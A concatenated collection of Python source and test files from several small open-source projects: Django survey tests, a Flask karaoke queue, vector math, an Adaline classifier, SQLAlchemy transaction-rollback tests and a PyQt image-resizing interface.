('education', 'What is your highest formal degree of education?'),
('employment', 'What is your current employment status?'),
('gender_intercept', 'What gender do you most identify with?'), (
'household_tenure', 'How many years have you lived at your current address?'),
('income', 'Are you a homeowner or a renter?'),
('race', 'Which race or ethnicity best describes you?'),
('transportation', 'How did you travel here?')]
assert response.status_code == 200
assert len(plugins) == 4
for question in intercept_presets:
assert question in plugins['Intercept']
@pytest.mark.django_db
def test_survey_edit_observational(client, user, survey_form_entry_observational, form_element_observational):
client.force_login(user)
url = reverse('fobi.edit_form_entry', kwargs={'form_entry_id': survey_form_entry_observational.id})
response = client.get(url)
plugins = response.context['user_form_element_plugins']
html = response.content.decode('utf-8')
assert response.status_code == 200
assert len(plugins) == 4
for choice, _ in AGE_COMPLEX_CHOICES:
label = '<label>{}</label>'.format(choice)
assert label in html
@pytest.mark.django_db
def test_survey_preview(client, user, survey_form_entry_observational):
client.force_login(user)
url = reverse('fobi.view_form_entry', kwargs={'form_entry_slug': survey_form_entry_observational.slug})
response = client.get(url)
assert response.status_code == 200
assert not response.context['form_entry'].surveyformentry.published
assert ('Preview ' + survey_form_entry_observational.name) in response.content.decode('utf-8')
@pytest.mark.django_db
def test_survey_publish(client, survey_form_entry_observational):
assert not survey_form_entry_observational.published
url = reverse('surveys-publish', kwargs={'form_entry_id': survey_form_entry_observational.id})
get_response = client.get(url)
assert get_response.status_code == 200
post_response = client.post(url)
survey_form_entry_observational.refresh_from_db()
assert post_response.status_code == 302
assert survey_form_entry_observational.published
@pytest.mark.django_db
def test_survey_submitted_list(client, user, survey, survey_form_entry):
client.force_login(user)
url = reverse('surveys-submitted-list')
response = client.get(url)
surveys_submitted = response.context['surveys_submitted']
assert response.status_code == 200
assert len(surveys_submitted) == 1
assert str(surveys_submitted.first().form_title) == 'Sample Form Entry'
@pytest.mark.django_db
def test_survey_submitted_detail(client, user, survey_form_entry, survey, survey_row, survey_component):
client.force_login(user)
url = reverse('surveys-submitted-detail', kwargs={'form_entry_id': survey_form_entry.id})
response = client.get(url)
surveys_submitted = response.context['surveys_submitted']
assert response.status_code == 200
assert len(surveys_submitted) == 1
```
|
{
"source": "jeancochrane/karaoke-party",
"score": 3
}
|
#### File: karaoke-party/tests/conftest.py
```python
from unittest import TestCase
import tests.env
import karaoke
class KaraokeTestCase(TestCase):
'''
Create a test client for the app.
'''
@classmethod
def setUpClass(cls):
'''
Initialize testing configs and create a test app.
'''
karaoke.app.testing = True
karaoke.app.config.from_object('tests.test_settings')
# Create a test client
cls.app = karaoke.app.test_client()
```
#### File: karaoke-party/tests/test_queue.py
```python
from unittest import TestCase
import psycopg2 as pg
import psycopg2.extensions as pg_extensions
import tests.env
import karaoke
from karaoke.queue import Queue
from karaoke.exceptions import QueueError
from tests.conftest import KaraokeTestCase
class TestQueue(KaraokeTestCase):
'''
Test some methods of the Queue class.
'''
@classmethod
def setUpClass(cls):
'''
Set up a test client and database.
'''
# Create the test database using an external connection
cls.ext_conn = karaoke.connect_db()
cls.ext_conn.set_isolation_level(pg_extensions.ISOLATION_LEVEL_AUTOCOMMIT)
with cls.ext_conn:
with cls.ext_conn.cursor() as curs:
curs.execute('CREATE DATABASE karaoke_test;')
# Set up the test client
super().setUpClass()
# Initialize the test database
with karaoke.app.app_context():
karaoke.init_db()
# Connect to the test database and create a queue to test
cls.conn = karaoke.connect_db()
cls.queue = Queue(cls.conn)
# Load some fake song data
with cls.conn:
with cls.conn.cursor() as curs:
curs.execute('''
INSERT INTO song
(title, artist, url)
VALUES
('foo', 'bar', 'baz')
''')
@classmethod
def tearDownClass(cls):
'''
Remove the test database and close out the connection.
'''
cls.conn.close()
with cls.ext_conn:
with cls.ext_conn.cursor() as curs:
curs.execute('DROP DATABASE karaoke_test')
# Close out all connections
cls.ext_conn.close()
def tearDown(self):
self.queue.flush()
def test_queue_add_and_get(self):
singer, song_id = 'foo', 1
queue_id = self.queue.add(singer, song_id)
queue_attrs = self.queue.get()
# Make sure the queue returns all of the original information
for orig, returned in zip(queue_attrs, (singer, song_id, queue_id)):
self.assertEqual(orig, returned)
def test_queue_get_empty(self):
no_singer, no_song_id, no_queue_id = self.queue.get()
# Make sure there's nothing on the queue
for item in (no_singer, no_song_id, no_queue_id):
self.assertIsNone(item)
def test_queue_delete(self):
singer, song_id = 'foo', 1
self.queue.add(singer, song_id)
got_singer, got_song_id, queue_id = self.queue.get()
deleted_id = self.queue.delete(queue_id)
self.assertEqual(queue_id, deleted_id)
# Make sure there's nothing on the queue
no_singer, no_song_id, no_queue_id = self.queue.get()
for item in (no_singer, no_song_id, no_queue_id):
self.assertIsNone(item)
def test_queue_delete_raises_error(self):
# Delete an item that isn't on the queue
with self.assertRaises(QueueError):
self.queue.delete(1)
def test_queue_flush(self):
singer, song_id = 'foo', 1
self.queue.add(singer, song_id)
self.queue.flush()
# Make sure there's nothing on the queue
no_singer, no_song_id, no_queue_id = self.queue.get()
for item in (no_singer, no_song_id, no_queue_id):
self.assertIsNone(item)
```
#### File: karaoke-party/tests/test_routes.py
```python
import unittest
import json
from unittest.mock import MagicMock, patch
import karaoke
from karaoke.queue import Queue
from karaoke.exceptions import QueueError
import tests.env
from tests.conftest import KaraokeTestCase
# POST data fixture
POST_DATA = {
'singer': 'foo',
'song_id': '1',
}
class TestRoutes(KaraokeTestCase):
'''
Test the API routes.
'''
@classmethod
def setUpClass(cls):
'''
Mock out database access.
'''
super().setUpClass()
cls.patcher = patch('karaoke.routes.get_db')
cls.patcher.start()
@classmethod
def tearDownClass(cls):
cls.patcher.stop()
def assertResponseEqual(self, condition, response):
'''
Helper method that wraps `self.assertEqual()` and provides more exception
context.
'''
try:
self.assertEqual(*condition)
except AssertionError as e:
print(response.data.decode('utf-8'))
raise e
def test_play_resolves(self):
get_request = self.app.get('/play')
self.assertResponseEqual((get_request.status_code, 200), response=get_request)
def test_songs_resolves(self):
get_request = self.app.get('/songs')
self.assertResponseEqual((get_request.status_code, 200), response=get_request)
@patch('karaoke.routes.Queue.add', return_value=1)
def test_add_to_queue(self, mock_queue):
post_request = self.app.post('/queue', data=POST_DATA)
self.assertResponseEqual((post_request.status_code, 200), response=post_request)
json_response = json.loads(post_request.data.decode('utf-8'))
self.assertEqual(json_response.get('queue_id'), 1)
@patch('karaoke.routes.Queue.get', return_value=(POST_DATA['singer'], POST_DATA['song_id'], 1))
def test_get_from_queue(self, mock_queue):
get_request = self.app.get('/queue')
self.assertResponseEqual((get_request.status_code, 200), response=get_request)
json_response = json.loads(get_request.data.decode('utf-8'))
self.assertEqual(json_response.get('singer'), POST_DATA['singer'])
self.assertEqual(json_response.get('song_id'), POST_DATA['song_id'])
self.assertEqual(json_response.get('queue_id'), 1)
@patch('karaoke.routes.Queue.delete', return_value=1)
def test_delete_from_queue(self, mock_queue):
delete_request = self.app.post('/queue?delete=true&queue_id=1')
self.assertResponseEqual((delete_request.status_code, 200), response=delete_request)
delete_response = json.loads(delete_request.data.decode('utf-8'))
self.assertEqual(delete_response.get('queue_id'), 1)
def test_queue_delete_missing_id(self):
# Test a missing id parameter for deletion
missing_id = self.app.post('/queue?delete=true')
self.assertResponseEqual((missing_id.status_code, 403), response=missing_id)
missing_id_response = json.loads(missing_id.data.decode('utf-8'))
self.assertEqual(missing_id_response.get('status'),
'a `delete` request requires an `id` parameter')
def test_queue_add_missing_singer(self):
# Test missing singer form data
missing_singer_data = {'song_id': '1'}
missing_singer = self.app.post('/queue', data=missing_singer_data)
self.assertResponseEqual((missing_singer.status_code, 403), response=missing_singer)
missing_singer_response = json.loads(missing_singer.data.decode('utf-8'))
self.assertEqual(missing_singer_response.get('status'),
'an `add` request requires form data for a `singer` and `song_id`')
def test_queue_add_missing_song(self):
# Test missing song_id form data
missing_song_data = {'singer': 'foo'}
missing_song = self.app.post('/queue', data=missing_song_data)
self.assertResponseEqual((missing_song.status_code, 403), response=missing_song)
missing_song_response = json.loads(missing_song.data.decode('utf-8'))
self.assertEqual(missing_song_response.get('status'),
'an `add` request requires form data for a `singer` and `song_id`')
@patch('karaoke.routes.Queue.delete', side_effect=QueueError)
def test_queue_delete_queue_id_doesnt_exist(self, mock_queue):
# Test a delete request for a song that doesn't exist
bad_queue_id = self.app.post('/queue?delete=true&queue_id=1')
self.assertResponseEqual((bad_queue_id.status_code, 403), response=bad_queue_id)
bad_queue_id_response = json.loads(bad_queue_id.data.decode('utf-8'))
self.assertEqual(bad_queue_id_response.get('status'),
'an item was not found on the queue with the id 1')
if __name__ == '__main__':
unittest.main()
```
|
{
"source": "jeancochrane/learning",
"score": 3
}
|
#### File: linear-algebra/tests/test_vector_operations.py
```python
import unittest
import env
from linalg.vector import Vector
class TestVectorOperations(unittest.TestCase):
def test_vector_equality(self):
a = Vector([1, 2, 3])
b = Vector([1, 2, 3])
self.assertEqual(a, b)
def test_vector_inequality(self):
a = Vector([1, 2, 3])
b = Vector([4, 5, 6])
self.assertNotEqual(a, b)
def test_vector_addition(self):
a = Vector([8.218, -9.341])
b = Vector([-1.129, 2.111])
self.assertEqual(a + b, Vector([7.089, -7.229999999999999]))
def test_vector_subtraction(self):
a = Vector([7.119, 8.215])
b = Vector([-8.223, 0.878])
self.assertEqual(a - b, Vector([15.342, 7.337]))
def test_scalar_multiplication(self):
a = Vector([1.671, -1.012, -0.318])
c = 7.41
self.assertEqual(a * c, Vector([12.38211, -7.49892, -2.35638]))
def test_vector_rounding(self):
v = Vector([1.2345, 6.6789])
self.assertEqual(v.round(2), Vector([1.23, 6.68]))
def test_vector_magnitude(self):
v = Vector([-0.221, 7.437])
self.assertEqual(round(v.magnitude(), 3), 7.440)
def test_vector_normalization(self):
w = Vector([1.996, 3.108, -4.554])
self.assertEqual(w.normalized(), Vector([0.3404012959433014,
0.5300437012984873,
-0.7766470449528028]))
def test_dot_product(self):
v = Vector([7.887, 4.138])
w = Vector([-8.802, 6.776])
self.assertEqual(round(v.dot(w), 3), -41.382)
def test_dot_product_association(self):
"""
The dot product is associative, meaning it shouldn't matter what
order the vectors go in.
"""
v = Vector([7, 4])
w = Vector([-8, 6.776])
self.assertEqual(v.dot(w), w.dot(v))
def test_inner_angle_radians(self):
v = Vector([3.183, -7.627])
w = Vector([-2.668, 5.319])
self.assertEqual(round(v.inner_angle(w), 3), 3.072)
def test_inner_angle_degrees(self):
v = Vector([7.35, 0.221, 5.188])
w = Vector([2.751, 8.259, 3.985])
self.assertEqual(round(v.inner_angle(w, degrees=True), 3), 60.276)
def test_orthogonality(self):
v = Vector([-7.579, -7.88])
w = Vector([22.737, 23.64])
self.assertFalse(v.is_orthogonal(w))
v = Vector([-2.029, 9.97, 4.172])
w = Vector([-9.231, -6.639, -7.245])
self.assertFalse(v.is_orthogonal(w))
v = Vector([-2.328, -7.284, -1.214])
w = Vector([-1.821, 1.072, -2.94])
self.assertTrue(v.is_orthogonal(w))
v = Vector([2.118, 4.827])
w = Vector([0, 0])
self.assertTrue(v.is_orthogonal(w))
def test_parallelism(self):
v = Vector([-7.579, -7.88])
w = Vector([22.737, 23.64])
self.assertTrue(v.is_parallel(w))
v = Vector([-2.029, 9.97, 4.172])
w = Vector([-9.231, -6.639, -7.245])
self.assertFalse(v.is_parallel(w))
v = Vector([-2.328, -7.284, -1.214])
w = Vector([-1.821, 1.072, -2.94])
self.assertFalse(v.is_parallel(w))
v = Vector([2.118, 4.827])
w = Vector([0, 0])
self.assertTrue(v.is_parallel(w))
def test_identity_vector_orthogonality_and_parallelism(self):
"""
The zero vector is the only vector that is both orthogonal and
parallel to itself.
"""
v = Vector([0, 0, 0])
self.assertTrue(v.is_orthogonal(v))
self.assertTrue(v.is_parallel(v))
w = Vector([4, 5, 6])
self.assertFalse(w.is_orthogonal(w))
self.assertTrue(w.is_parallel(w))
def test_vector_projections(self):
"""
Testing vector projection, orthogonal components, and
decomposition.
"""
v = Vector([3.039, 1.879])
b = Vector([0.825, 2.036])
proj = v.project(b)
self.assertEqual(proj.round(3), Vector([1.083, 2.672]))
v = Vector([-9.88, -3.264, -8.159])
b = Vector([-2.155, -9.353, -9.473])
orth = v.orthogonal_component(b)
try:
self.assertEqual(orth.round(3), Vector([-8.350, 3.376, -1.434]))
except AssertionError as e:
print(orth.round(3))
print(Vector([-8.350, 3.376, -1.434]))
raise(e)
v = Vector([3.009, -6.172, 3.692, -2.51])
b = Vector([6.404, -9.144, 2.759, 8.718])
v_decomposed = (v.project(b) +
v.orthogonal_component(b))
self.assertEqual(v, v_decomposed.round(3))
def test_cross_product(self):
"""
Testing the calculation of cross products, as well as the areas
of parallelograms and triangles spanned by different vectors.
"""
v = Vector([8.462, 7.893, -8.187])
w = Vector([6.984, -5.975, 4.778])
cross = v.cross(w)
self.assertEqual(cross.round(3), Vector([-11.205,
-97.609,
-105.685]))
v = Vector([-8.987, -9.838, 5.031])
w = Vector([-4.268, -1.861, -8.866])
par_area = v.parallelogram_area(w)
self.assertEqual(round(par_area, 3), 142.122)
v = Vector([1.5, 9.547, 3.691])
w = Vector([-6.007, 0.124, 5.772])
tri_area = v.triangle_area(w)
self.assertEqual(round(tri_area, 3), 42.565)
if __name__ == '__main__':
unittest.main()
```
#### File: code/algos/adaline.py
```python
import numpy as np
class Adaline(object):
def __init__(self, bias=0, eta=0.01, epoch=10, stochastic=False,
shuffle=True):
self.bias = bias
self.eta = eta
self.epoch = epoch
self.stochastic = stochastic
self.shuffle = shuffle
def net_input(self, x):
return self.weights[0] + np.dot(x, self.weights[1:])
def _initialize_weights(self, X):
self.weights = np.zeros(1 + X.shape[1])
self.weights[0] = -self.bias
return self
def fit(self, X, y):
self._initialize_weights(X)
self.cost = []
for _ in range(self.epoch):
if self.shuffle:
X, y = self._shuffle(X, y)
if self.stochastic:
cost = []
for xi, yi in zip(X, y):
error = yi - self.activation(xi)
self.weights[0] += self.eta * error
self.weights[1:] += self.eta * xi.dot(error)
cost.append(error**2 / 2)
self.cost.append(sum(cost) / len(cost))
else:
errors = y - self.activation(X)
self.weights[0] += self.eta * errors.sum()
self.weights[1:] += self.eta * X.T.dot(errors)
cost = (errors**2).sum() / 2
self.cost.append(cost)
return self
def partial_fit(self, X, y):
try:
assert len(self.weights)
except AttributeError:
self._initialize_weights(X)
error = y - self.activation(X)
self.weights[0] += self.eta * error
self.weights[1:] += self.eta * X.dot(error)
return self
def activation(self, x):
return self.net_input(x)
def predict(self, x):
return np.where(self.activation(x) >= 0, 1, -1)
def _shuffle(self, X, y):
order = np.random.permutation(len(y))
return X[order], y[order]
```
|
{
"source": "jeancochrane/mellow-bike-map",
"score": 3
}
|
#### File: mellow-bike-map/tests/test_views.py
```python
import pytest
from mbm import views
@pytest.mark.parametrize('dist_in_meters,expected', [
(100, ('0.1 miles', '<1 minute')),
(300, ('0.2 miles', '1 minute')),
(1000, ('0.6 miles', '4 minutes')),
(1609, ('1.0 miles', '6 minutes'))
])
def test_format_distance(dist_in_meters, expected):
route = views.Route()
distance, time = route.format_distance(dist_in_meters)
expected_dist, expected_time = expected
assert distance == expected_dist
assert time == expected_time
```
|
{
"source": "jeancochrane/pytest-flask-sqlalchemy-transactions",
"score": 3
}
|
#### File: pytest-flask-sqlalchemy-transactions/tests/test_fixtures.py
```python
import os
def test_use_db_session_to_alter_database(db_testdir):
'''
Test that creating objects and emitting SQL in the ORM won't bleed into
other tests.
'''
# Load tests from file
db_testdir.makepyfile("""
def test_use_db_session_to_alter_database(person, db_engine, db_session):
# Create a new object instance using the ORM
opts = {
'id': 1,
'name': 'tester'
}
new_inst = person(**opts)
db_session.add(new_inst)
db_session.commit()
# Create a new object instance by emitting raw SQL from the session object
db_session.execute('''
insert into person (id, name)
values (2, '<NAME>')
''')
# Make sure that the session object has registered changes
name_list = db_session.execute('''select name from person''').fetchall()
names = [name[0] for name in name_list]
assert 'tester' in names
assert '<NAME>' in names
def test_db_session_changes_dont_persist(person, db_engine, db_session):
assert not db_engine.execute('''select * from person''').fetchone()
assert not db_session.query(person).first()
""")
# Run tests
result = db_testdir.runpytest()
result.assert_outcomes(passed=2)
def test_use_db_engine_to_alter_database(db_testdir):
'''
Use the `db_engine` fixture to alter the database directly.
'''
db_testdir.makepyfile("""
def test_use_db_engine_to_alter_database(person, db_engine, db_session):
db_engine.execute('''
insert into person (id, name)
values (1, 'tester')
''')
# Use the contextmanager to retrieve a connection
with db_engine.begin() as conn:
conn.execute('''
insert into person (id, name)
values (2, '<NAME>')
''')
first_person = db_session.query(person).get(1)
second_person = db_session.query(person).get(2)
assert first_person.name == 'tester'
assert second_person.name == '<NAME>'
def test_db_engine_changes_dont_persist(person, db_engine, db_session):
assert not db_engine.execute('''select * from person''').fetchone()
assert not db_session.query(person).first()
""")
result = db_testdir.runpytest()
result.assert_outcomes(passed=2)
def test_raise_programmingerror_rolls_back_transaction(db_testdir):
'''
Make sure that when a ProgrammingError gets raised and handled, the
connection will continue to be usable.
'''
db_testdir.makepyfile("""
import pytest
import sqlalchemy as sa
def test_raise_programmingerror_rolls_back_transaction(person, db_engine, db_session):
# Confirm that we can raise a ProgrammingError
with pytest.raises(sa.exc.ProgrammingError):
# Run a query that doesn't correspond to an existing table
with db_engine.begin() as conn:
db_engine.execute('''
SELECT record_count FROM 'browser'
''')
# Handle the ProgrammingError the way we do in the code (try/except block)
try:
with db_engine.begin() as conn:
conn.execute('''
SELECT record_count FROM 'browser'
''')
except sa.exc.ProgrammingError:
pass
# This query will raise an InternalError if ProgrammingErrors don't get handled properly,
# since the ProgrammingError aborts the transaction by default
with db_engine.begin() as conn:
nonexistent_person = conn.execute('''SELECT name FROM person''').fetchone()
assert not nonexistent_person
# Make some changes that we can check in the following test
db_engine.execute('''
insert into person (id, name)
values (1, 'tester')
''')
person = db_session.query(person).get(1)
assert person.name == 'tester'
def test_raise_programmingerror_changes_dont_persist(person, db_engine, db_session):
assert not db_engine.execute('''select * from person''').fetchone()
assert not db_session.query(person).first()
""")
result = db_testdir.runpytest()
result.assert_outcomes(passed=2)
def test_transaction_commit(db_testdir):
'''
Make some changes directly using the Transaction object and confirm that
they appear.
'''
db_testdir.makepyfile("""
def test_transaction_commit(person, db_engine, db_session):
with db_engine.begin() as conn:
trans = conn.begin()
conn.execute('''
insert into person (id, name)
values (1, 'tester')
''')
trans.commit()
conn.close()
person = db_session.query(person).get(1)
assert person.name == 'tester'
def test_transaction_commit_changes_dont_persist(person, db_engine, db_session):
assert not db_engine.execute('''select * from person''').fetchone()
assert not db_session.query(person).first()
""")
result = db_testdir.runpytest()
result.assert_outcomes(passed=2)
def test_transaction_rollback(db_testdir):
'''
Attempt to roll back the active transaction and then alter the database. When not
handled properly, this can have the effect of causing changes to persist
across tests.
'''
db_testdir.makepyfile("""
import sqlalchemy as sa
def test_transaction_rollback(person, db_engine, db_session):
db_engine.execute('''
insert into person (id, name)
values (1, 'tester')
''')
with db_engine.begin() as conn:
trans = conn.begin()
try:
conn.execute('''
SELECT record_count FROM 'browser'
''')
except sa.exc.ProgrammingError:
trans.rollback()
conn.close()
person = db_session.query(person).get(1)
assert person.name == 'tester'
def test_transaction_rollback_changes_dont_persist(person, db_engine, db_session):
assert not db_engine.execute('''select * from person''').fetchone()
assert not db_session.query(person).first()
""")
result = db_testdir.runpytest()
result.assert_outcomes(passed=2)
def test_drop_table(db_testdir):
'''
Make sure that we can drop tables and verify they do not exist in the context
of a test.
'''
db_testdir.makepyfile("""
def test_drop_table(person, db_engine):
# Drop the raw table
db_engine.execute('''
DROP TABLE "person"
''')
# Check if the raw table exists
existing_tables = db_engine.execute('''
SELECT relname
FROM pg_catalog.pg_class
WHERE relkind in ('r', 'm')
AND relname = 'person'
''').first()
assert not existing_tables
def test_drop_table_changes_dont_persist(person, db_engine):
existing_tables = db_engine.execute('''
SELECT relname
FROM pg_catalog.pg_class
WHERE relkind in ('r', 'm')
AND relname = 'person'
''').first()
assert existing_tables
""")
result = db_testdir.runpytest()
result.assert_outcomes(passed=2)
def test_use_raw_connection_to_alter_database(db_testdir):
'''
Retrieve a raw DBAPI connection and use it to make changes to the database.
'''
db_testdir.makepyfile("""
def test_use_raw_connection_to_alter_database(person, db_engine, db_session):
# Make some changes so that we can make sure they persist after a raw connection
# rollback
db_engine.execute('''
insert into person (id, name)
values (1, 'tester')
''')
# Make changes with a raw connection
conn = db_engine.raw_connection()
cursor = conn.cursor()
cursor.execute('''
insert into person (id, name)
values (2, '<NAME>')
''')
conn.commit()
# Check to make sure that the changes are visible to the original connection
second_person = db_engine.execute('''select name from person where id = 2''').fetchone()[0]
assert second_person == '<NAME>'
# Roll back the changes made by the raw connection
conn.rollback()
conn.close()
# Make sure earlier changes made by the original connection persist after rollback
orig_person = db_session.query(person).get(1)
assert orig_person.name == 'tester'
def test_raw_connection_changes_dont_persist(person, db_engine, db_session):
assert not db_engine.execute('''select * from person''').fetchone()
assert not db_session.query(person).first()
""")
result = db_testdir.runpytest()
result.assert_outcomes(passed=2)
def test_commit_works_with_deleted_dependent(db_testdir):
'''
Make sure a commit still works with a dangling reference to a
deleted instance.
Exercise one way to trigger the issue reported in
https://github.com/jeancochrane/pytest-flask-sqlalchemy/issues/5
'''
db_testdir.makepyfile("""
def test_delete_message(account_address, db_session):
account, address = account_address
# Create a new object instance using the ORM
account_inst = account(id=1)
db_session.add(account_inst)
# Create a dependent object instance using the ORM
address_inst = address(id=101, account_id=1)
db_session.add(address_inst)
db_session.commit()
# Access the address through an ORM attribute
assert account_inst.addresses
# Delete the address out from under account_inst and the ORM
db_session.delete(address_inst)
# shouldn't see an exception like
# sqlalchemy.exc.InvalidRequestError:
# Instance XXX has been deleted.
# Use the make_transient() function to send
# this object back to the transient state.
db_session.commit()
""")
result = db_testdir.runpytest()
result.assert_outcomes(passed=1)
```
|
{
"source": "JeanCollomb/Resize_Image_DPI",
"score": 2
}
|
#### File: Resize_Image_DPI/exemple/interface.py
```python
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(511, 379)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.groupBox = QtWidgets.QGroupBox(self.centralwidget)
self.groupBox.setGeometry(QtCore.QRect(10, 10, 491, 91))
self.groupBox.setObjectName("groupBox")
self.pushButton_selection_photos = QtWidgets.QPushButton(self.groupBox)
self.pushButton_selection_photos.setGeometry(QtCore.QRect(10, 20, 231, 23))
self.pushButton_selection_photos.setObjectName("pushButton_selection_photos")
self.pushButton_selection_dossier_export = QtWidgets.QPushButton(self.groupBox)
self.pushButton_selection_dossier_export.setGeometry(QtCore.QRect(250, 20, 231, 23))
self.pushButton_selection_dossier_export.setObjectName("pushButton_selection_dossier_export")
self.label_info_init = QtWidgets.QLabel(self.groupBox)
self.label_info_init.setGeometry(QtCore.QRect(10, 50, 231, 31))
self.label_info_init.setAlignment(QtCore.Qt.AlignCenter)
self.label_info_init.setObjectName("label_info_init")
self.label = QtWidgets.QLabel(self.groupBox)
self.label.setGeometry(QtCore.QRect(250, 50, 231, 31))
font = QtGui.QFont()
font.setItalic(True)
font.setStyleStrategy(QtGui.QFont.PreferDefault)
self.label.setFont(font)
self.label.setAcceptDrops(False)
self.label.setScaledContents(False)
self.label.setAlignment(QtCore.Qt.AlignCenter)
self.label.setWordWrap(True)
self.label.setObjectName("label")
self.groupBox_2 = QtWidgets.QGroupBox(self.centralwidget)
self.groupBox_2.setGeometry(QtCore.QRect(10, 110, 241, 101))
self.groupBox_2.setObjectName("groupBox_2")
self.checkBox_multi_process = QtWidgets.QCheckBox(self.groupBox_2)
self.checkBox_multi_process.setGeometry(QtCore.QRect(10, 70, 158, 17))
self.checkBox_multi_process.setObjectName("checkBox_multi_process")
self.checkBox_pdf = QtWidgets.QCheckBox(self.groupBox_2)
self.checkBox_pdf.setGeometry(QtCore.QRect(10, 46, 158, 17))
self.checkBox_pdf.setObjectName("checkBox_pdf")
self.checkBox_jpg = QtWidgets.QCheckBox(self.groupBox_2)
self.checkBox_jpg.setGeometry(QtCore.QRect(10, 22, 158, 17))
self.checkBox_jpg.setObjectName("checkBox_jpg")
self.groupBox_3 = QtWidgets.QGroupBox(self.centralwidget)
self.groupBox_3.setGeometry(QtCore.QRect(10, 220, 491, 111))
self.groupBox_3.setObjectName("groupBox_3")
self.progressBar = QtWidgets.QProgressBar(self.groupBox_3)
self.progressBar.setGeometry(QtCore.QRect(10, 80, 471, 21))
self.progressBar.setProperty("value", 0)
self.progressBar.setObjectName("progressBar")
self.label_info_conversion = QtWidgets.QLabel(self.groupBox_3)
self.label_info_conversion.setGeometry(QtCore.QRect(10, 51, 471, 21))
self.label_info_conversion.setAlignment(QtCore.Qt.AlignCenter)
self.label_info_conversion.setObjectName("label_info_conversion")
self.pushButton_lancement_conversion = QtWidgets.QPushButton(self.groupBox_3)
self.pushButton_lancement_conversion.setGeometry(QtCore.QRect(10, 22, 471, 23))
self.pushButton_lancement_conversion.setObjectName("pushButton_lancement_conversion")
self.groupBox_4 = QtWidgets.QGroupBox(self.centralwidget)
self.groupBox_4.setGeometry(QtCore.QRect(260, 110, 241, 101))
self.groupBox_4.setObjectName("groupBox_4")
self.lineEdit_DPI = QtWidgets.QLineEdit(self.groupBox_4)
self.lineEdit_DPI.setGeometry(QtCore.QRect(130, 30, 101, 20))
font = QtGui.QFont()
font.setItalic(True)
self.lineEdit_DPI.setFont(font)
self.lineEdit_DPI.setAlignment(QtCore.Qt.AlignCenter)
self.lineEdit_DPI.setClearButtonEnabled(True)
self.lineEdit_DPI.setObjectName("lineEdit_DPI")
self.label_2 = QtWidgets.QLabel(self.groupBox_4)
self.label_2.setGeometry(QtCore.QRect(10, 30, 111, 16))
self.label_2.setAlignment(QtCore.Qt.AlignCenter)
self.label_2.setObjectName("label_2")
self.label_3 = QtWidgets.QLabel(self.groupBox_4)
self.label_3.setGeometry(QtCore.QRect(10, 60, 111, 31))
self.label_3.setScaledContents(False)
self.label_3.setAlignment(QtCore.Qt.AlignCenter)
self.label_3.setWordWrap(True)
self.label_3.setObjectName("label_3")
self.lineEdit_largeur = QtWidgets.QLineEdit(self.groupBox_4)
self.lineEdit_largeur.setGeometry(QtCore.QRect(130, 70, 101, 20))
font = QtGui.QFont()
font.setItalic(True)
self.lineEdit_largeur.setFont(font)
self.lineEdit_largeur.setToolTip("")
self.lineEdit_largeur.setInputMask("")
self.lineEdit_largeur.setAlignment(QtCore.Qt.AlignCenter)
self.lineEdit_largeur.setClearButtonEnabled(True)
self.lineEdit_largeur.setObjectName("lineEdit_largeur")
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 511, 21))
self.menubar.setObjectName("menubar")
self.menuFichier = QtWidgets.QMenu(self.menubar)
self.menuFichier.setObjectName("menuFichier")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.actionQuitter = QtWidgets.QAction(MainWindow)
self.actionQuitter.setObjectName("actionQuitter")
self.menuFichier.addAction(self.actionQuitter)
self.menubar.addAction(self.menuFichier.menuAction())
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.groupBox.setTitle(_translate("MainWindow", "Initialisation"))
self.pushButton_selection_photos.setText(_translate("MainWindow", "Selection des photos à convertir"))
self.pushButton_selection_dossier_export.setText(_translate("MainWindow", "Selection du dossier d\'exportation"))
self.label_info_init.setText(_translate("MainWindow", "Veuiller sélectionner les photos à convertir"))
self.label.setText(_translate("MainWindow", "Un sous dossier \'export\' sera créé automatiquement dans le dossier sélectionné"))
self.groupBox_2.setTitle(_translate("MainWindow", "Options"))
self.checkBox_multi_process.setText(_translate("MainWindow", "Multi-process"))
self.checkBox_pdf.setText(_translate("MainWindow", "Convertir en .pdf"))
self.checkBox_jpg.setText(_translate("MainWindow", "Convertir en .jpg"))
self.groupBox_3.setTitle(_translate("MainWindow", "Conversion"))
self.label_info_conversion.setText(_translate("MainWindow", "informations convertion"))
self.pushButton_lancement_conversion.setText(_translate("MainWindow", "Lancement de la convertion"))
self.groupBox_4.setTitle(_translate("MainWindow", "Réglages"))
self.lineEdit_DPI.setText(_translate("MainWindow", "300"))
self.label_2.setText(_translate("MainWindow", "DPI"))
self.label_3.setText(_translate("MainWindow", "Dimension max. image finale (cm)"))
self.lineEdit_largeur.setText(_translate("MainWindow", "21"))
self.menuFichier.setTitle(_translate("MainWindow", "Fichier"))
self.actionQuitter.setText(_translate("MainWindow", "Quitter"))
```
#### File: Resize_Image_DPI/exemple/main_pydpi.py
```python
import sys
from multiprocessing import cpu_count
from threading import Thread
from PIL import Image
from os import makedirs, listdir
from os.path import exists, normpath, dirname, getsize
from PyQt5.QtWidgets import QApplication, QMainWindow, qApp, QFileDialog
from interface import Ui_MainWindow #changer nom du fichier et de la class Ui
###############################################################################
###############################################################################
class MainWindow(QMainWindow, Ui_MainWindow): #changer le nom de la class Ui
def __init__(self, parent=None):
super(MainWindow, self).__init__(parent)
qApp.installEventFilter(self)
self.setupUi(self)
# Liens a faire ici
self.pushButton_selection_photos.clicked.connect(self.fct_selection_images)
self.pushButton_selection_dossier_export.clicked.connect(self.fct_selection_dossier_export)
self.pushButton_lancement_conversion.clicked.connect(self.lancement_conversion)
self.actionQuitter.triggered.connect(qApp.quit)
self.show()
###############################################################################
###############################################################################
# Fonctions associees aux liens crees ci-dessus
def lancement_conversion(self):
'''
'''
self.label_info_conversion.setText('Conversion en cours ...')
self.progressBar.setValue(0)
self.dpi = None
